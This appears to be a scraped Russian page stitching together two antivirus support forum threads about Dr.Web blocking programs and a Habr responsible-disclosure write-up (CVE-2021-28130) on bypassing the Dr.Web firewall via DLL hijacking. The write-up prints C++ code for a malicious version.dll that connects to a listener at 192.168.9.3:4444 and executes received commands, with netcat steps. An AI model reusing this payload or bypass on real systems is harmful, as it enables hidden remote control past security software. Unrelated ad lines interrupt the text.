Dr web блокирует программы

Здравствуйте. Скачал сканер RSIT, но он не запускается. При нажатии правой кнопки мыши в контекстном меню появляется «Проверить Dr.Web». Подскажите как запустить RSIT?

5 февраля, 2009 в 5:26 пп #21776
Participant

  • Темы:1
  • Сообщений:2

6 февраля, 2009 в 4:05 пп #21777

  • Темы:40
  • Сообщений:5676

Здравствуйте, добро пожаловать на Spyware-ru форум.

Для запуска RSIT нужно дважды кликнуть по этому файлу левой клавишей. Если DrWeb блокирует программу, то отключите его.

7 февраля, 2009 в 5:03 пп #21778

  • Темы:40
  • Сообщений:5676

Судя по логу ваш компьютер заражён autorun.inf трояном.
Отключите ваш антивирус, прочитайте эту инструкцию Flash_Disinfector ещё одно оружие против autorun.inf троянов. Скачайте и запустите Flash_Disinfector, не забудьте при этом по требованию программы вставить ваш флэш диск или подключить другие внешние устройства хранения информации.

Скачайте OTMoveIt3 by OldTimer кликнув по этой ссылке.

Как исправить ошибку в Tlauncher block.doctor.web?


Запустите программу и в большое поле ввода (заголовок этого поля выделен желтым цветом) скопируйте следующий текст.

Кликните по кнопке MoveIt!. В процессе работы возможна перезагрузка компьютера.
По-завершении работы программы должен будет показан лог, вставьте его в ваш ответ.
Так же к вашему ответу приложите свежий RSIT лог.

И ещё, пожалуйста отвечайте в этой теме, не создавайте новые темы.

Источник: www.spyware-ru.com

Dr Web блокирует программы

- - - - -

  • Members
  • 2 Сообщений:
  • Отправлено 23 Ноябрь 2010 — 15:13

    Здравствуйте. Моя проблема заключается в том что антивирус блокирует запуск программ. Версия прораммы 5,0 стоит на windows7. Проблема нагрянула внезапно после перезагрузки компьютера. Пожалуйста подскажите что мне делать? Началось с блокировки программы Adobe premiere 5.0

    #2 YVS

  • Helpers
  • 4 798 Сообщений:
  • Отправлено 23 Ноябрь 2010 — 15:14

    А почену на 6.0 не перейдете?

    #3 Borka

    Забанен за флуд

    Как отключить блокировку брандмауэр Dr.Web

  • Members
  • 19 512 Сообщений:
  • Отправлено 23 Ноябрь 2010 — 15:20

    Здравствуйте. Моя проблема заключается в том что антивирус блокирует запуск программ. Версия прораммы 5,0 стоит на windows7. Проблема нагрянула внезапно после перезагрузки компьютера. Пожалуйста подскажите что мне делать? Началось с блокировки программы Adobe premiere 5.0

    А в чем проявляется блокировка запуск программ? Что в логе спайдера?
    С уважением,
    Борис А. Чертенко aka Borka.

    #4 Ko6Ra

  • Posters
  • 3 308 Сообщений:
  • Отправлено 23 Ноябрь 2010 — 15:23

    Проблема известна. Попробуйте отключить самозащиту и проверить работоспособность приложений.
    В скором времени ожидаем фикс.

    #5 mrbelyash

  • Members
  • 25 897 Сообщений:
  • Отправлено 23 Ноябрь 2010 — 15:24

    Сегодня будет обновление..оно произойдет автоматически и проблема уйдет.

    #6 Konstantin Yudin

    Konstantin Yudin

    Читайте также:
    Как сжимать видео без программ

  • Dr.Web Staff
  • 19 458 Сообщений:
  • Отправлено 23 Ноябрь 2010 — 17:07

    Здравствуйте. Моя проблема заключается в том что антивирус блокирует запуск программ. Версия прораммы 5,0 стоит на windows7. Проблема нагрянула внезапно после перезагрузки компьютера. Пожалуйста подскажите что мне делать? Началось с блокировки программы Adobe premiere 5.0

    на windows 7 лучше ставить 6.0 версию, она изначально разрабатывалась с учетом возможностей ос.
    With best regards, Konstantin Yudin
    Doctor Web, Ltd.

    #7 Hunter__1s

    Hunter__1s

  • Members
  • 2 Сообщений:
  • Отправлено 26 Ноябрь 2010 — 00:28

    Большое спасибо за поддержку переустановил windows и установил dr web 6.0 и проблемы закончились. И как написал Ko6Ra после отключения самозащиты все работает.

    Источник: forum.drweb.com

    Обход брандмауэра (firewall) в Dr.Web Security Space 12

    Данная статья написана в рамках ответственного разглашения информации о уязвимости. Хочу выразить благодарность сотрудникам Dr.Web за оперативное реагирование и исправление обхода брандмауэра (firewall).

    В этой статье я продемонстрирую обнаруженную мной возможность обхода брандмауэра (firewall) в продукте Dr.Web Security Space 12 версии.

    При исследовании различных техник и методик обхода антивирусных программ я заметил, что Dr.Web Security Space 12 версии блокирует любой доступ в Интернет у самописных приложений, хотя другие антивирусные программы так не реагируют. Мне захотелось проверить, возможно ли обойти данный механизм безопасности?

    Разведка

    Во время анализа работы антивирусной программы Dr.Web, я обнаружил, что некоторые исполняемые файлы (.exe), в папке C:Program FilesDrWeb, потенциально могут быть подвержены Dll hijacking.

    Dll Hijacking — это атака, основанная на способе поиска и загрузки динамически подключаемых библиотек приложениями Windows. Большинство приложений Windows при загрузке dll не используют полный путь, а указывают только имя файла. Из-за этого перед непосредственно загрузкой происходит поиск соответствующей библиотеки. С настройками по умолчанию поиск начинается с папки, где расположен исполняемый файл, и в случае отсутствия файла поиск продолжается в системных директориях. Такое поведение позволяет злоумышленнику разместить поддельную dll и почти гарантировать, что библиотека с нагрузкой загрузится в адресное пространство приложения и код злоумышленника будет исполнен.

    Например, возьмём один из исполняемых файлов – frwl_svc.exe версии 12.5.2.4160. С помощью Process Monitor от Sysinternals проследим поиск dll.

    Однако, у обычного пользователя нет разрешений для того чтобы подложить свой DLL файл в папку C:Program FilesDrWeb. Но рассмотрим вариант, в котором frwl_svc.exe будет скопирован в папку под контролем пользователя, к примеру, в папку Temp, а рядом подложим свою библиотеку version.dll. Такое действие не даст мне выполнение программы с какими-то новыми привилегиями, но так мой код из библиотеки будет исполнен в контексте доверенного приложения.

    Подготовительные мероприятия

    Я начну свой эксперимент с настройки двух виртуальных машин с Windows 10. Первая виртуальная машина служит для демонстрации пользователя с установленным антивирусом Dr.Web. Вторая виртуальная машина будет «ответной стороной», на ней установлен netcat для сетевого взаимодействия с первой виртуалкой. Начальные настройки при установке:

    Читайте также:
    Sap является сетевой программой

    • На первую виртуальную машину с IP 192.168.9.2 установлю Dr.Web последней версии, в процессе установки Dr.Web’а выберу следующие пункты:
    • На вторую виртуальную машину с ip 192.168.9.3 установлю netcat.

    Для демонстрации я разработал два исполняемых файла:

    • Приложение test_application.exe предназначено для демонстрации исправной работы брандмауэра (firewall). Простая утилита на С++, которая отправляет по сети сообщение “test”. Ещё она может принимать сетевые ответы и затем исполнять их. В случае нормальной работы брандмауэра (firewall) моё приложение test_application.exe не сможет отправить сообщение “test”.
    • Второй файл — это прокси-библиотека version.dll, которая размещается рядом с frwl_svc.exe на первой виртуальной машине. Функциональность та же, что и test_application.exe, только код собран как dll.

    void Payload() < char C2Server[] = «192.168.9.3»; int C2Port = 4444; SOCKET mySocket; sockaddr_in addr; WSADATA version; WSAStartup(MAKEWORD(2, 2), mySocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(C2Server); addr.sin_port = htons(C2Port); if (WSAConnect(mySocket, (SOCKADDR*) closesocket(mySocket); WSACleanup(); >else < printf(«Connection made sucessfullyn»); char* pBuf = «testn»; printf(«Sending request from clientn»); send(mySocket, pBuf, strlen(pBuf), 0); char szResponse[50]; recv(mySocket, szResponse, 50, 0); system(szResponse); closesocket(mySocket); WSACleanup(); >>

    Видео эксплуатации

    После подготовительных мероприятий, я, наконец, подошёл к эксплуатации. На этом видео представлена демонстрация возможности обхода брандмауэра (firewall) в продукте Dr.Web Security Space 12 версии. (Dr.Web, version.dll и test_application.exe находится на первой виртуальной машине, которая расположена с левой стороны видео. А netcat находится на второй виртуальной машине, которая расположена с правой стороны видео.)

    Вот что происходит на видео:

    • На второй виртуальной машине запускаем netcat он же nc64.exe и прослушиваем порт 4444.
    • Затем на первой виртуальной машине в папке C:UsersrootAppDataLocalTemp распакуем aplications.7z, там находятся version.dll и test_application.exe.
    • После этого, с помощью whoami показываем, что все действия от обычного пользователя.
    • Потом копируем C:Program FilesDrWebfrwl_svc.exe в папку C:UsersrootAppDataLocalTempaplications.
    • Дальше демонстрируем, что брандмауэр (firewall) включён, исключения отсутствуют и время последнего обновления антивируса.
    • Следующим шагом запускаем тестовое приложение test_application.exe и проверяем работоспособность брандмауэр (firewall). Dr.Web заблокировал тестовое приложение, а значит можно сделать вывод, что брандмауэр (firewall) работает корректно.
    • Запускаем frwl_svc.exe и видим подключение в nc64.exe на второй машине.
    • Передаём команду на создание папки test на первой машине с помощью nc64.exe, который находится на второй машине.

    Вывод

    Убедившись, что способ работает, можно сделать предположение, что, антивирус доверяет «своим» приложениям, и сетевые запросы, сделанные от имени таких исполняемых файлов, в фильтрацию не попадают. Копирование доверенного файла в подконтрольную пользователю папку с готовой библиотекой — не единственный способ исполнить код в контексте приложения, но один из самых легковоспроизводимых. На этом этапе я собрал все артефакты исследования и передал их специалистам Dr.Web. Вскоре я получил ответ, что уязвимость исправлена в новой версии.

    Читайте также:
    Рейтинг доверия по номеру телефона программа

    Проверка исправлений

    После сообщения о новой версии с иcправлением я решил посмотреть, как был исправлен обход. Начал с тех же действий, что и при разведке: что запустил frwl_svc.exe и посмотрел журнал Process Monitor, чтобы узнать какие Dll пытаются загрузиться.

    Вижу, что frwl_svc.exe версии 12.5.3.12180 больше не загружает стандартные dll. Это исправляет сам подход с dll hijacking, но появилась гипотеза, что логика работы с доверенными приложениями осталась. Для проверки я воспользовался старой версией frwl_svc.exe.

    Подготовительные мероприятия

    Начну проверку своей гипотезы с того, что настрою две виртуальные машины с windows 10 по аналогии с тем, как всё было в демонстрации.

    • На первую виртуальную машину с ip 192.168.9.2 я установлю Dr.Web последней версии. Процесс установки Dr.Web не отличатся от того, который был описан в предыдущем отчёте. А также в папку Temp я скопирую frwl_svc.exe версии 12.5.2.4160 и version.dll из предыдущего отчета.
    • На вторую виртуальную машину c ip 192.168.9.3 я установлю netcat.

    Видео эксплуатации

    После настройки двух виртуальных машин пришло время эксплуатации. На этом видео показана возможность обхода патча, которым Dr.Web исправил ошибку из предыдущего отчёта. Расположение виртуальных машин не отличается от представленных в предыдущем видео. Напомню, первая машина находится с левой стороны на видео, а вторая машина – с правой стороны. Действия в видео:

    • На второй виртуальной машине запускаем netcat(nc64.exe) и прослушиваем порт 4444.
    • Затем на первой виртуальной машине с помощью whoami показываем, что все действия от обычного пользователя.
    • Потом показываем версию frwl_svc.exe (12.5.2.4160) в папке C:Usersdrweb_testAppDataLocalTemp.
    • Дальше демонстрируем версию frwl_svc.exe (12.5.3.12180) в папке C:Program FilesDrWeb.
    • Следующим шагом показываем, что брандмауэр (firewall) включён, исключения отсутствуют и время последнего обновления.
    • После этого запускаем C:Usersdrweb_testAppDataLocalTemp frwl_svc.exe и видим подключение в nc64.exe во второй машине.
    • Последним шагом передаём команду на создание папки test на первой машине с помощью nc64.exe, который находится на второй машине.

    Вывод

    В результате проверки исправлений я обнаружил, что патч исправляет не саму проблему с доверенными приложениям, а только мой способ реализации данной уязвимости. Старая версия frwl_svc.exe отлично обходила ограничения. Все собранные сведения были переданы команде Dr Web. Вскоре была выпущена новая версия исправления, которая уже не обходилась моим методом.

    Timeline

    • 16.02.2021: Передача отчета в Dr.Web.
    • 25.02.2021: Dr.Web сообщает, что данная возможность обхода firewall исправлена.
    • 10.03.2021: Запрос cve.
    • 11.03.2021: Получение CVE 2021-28130.
    • 14.03.2021: Проверка исправлений.
    • 15.03.2021: Передача отчета в Dr.Web.
    • 06.04.2021: Dr.Web сообщает, что данная возможность обхода firewall исправлена.
    • 23.09.2021: Публикация статьи.
    • Блог компании Перспективный мониторинг
    • Информационная безопасность
    • Антивирусная защита

    Источник: habr.com

    Рейтинг
    ( Пока оценок нет )
    Загрузка ...
    EFT-Soft.ru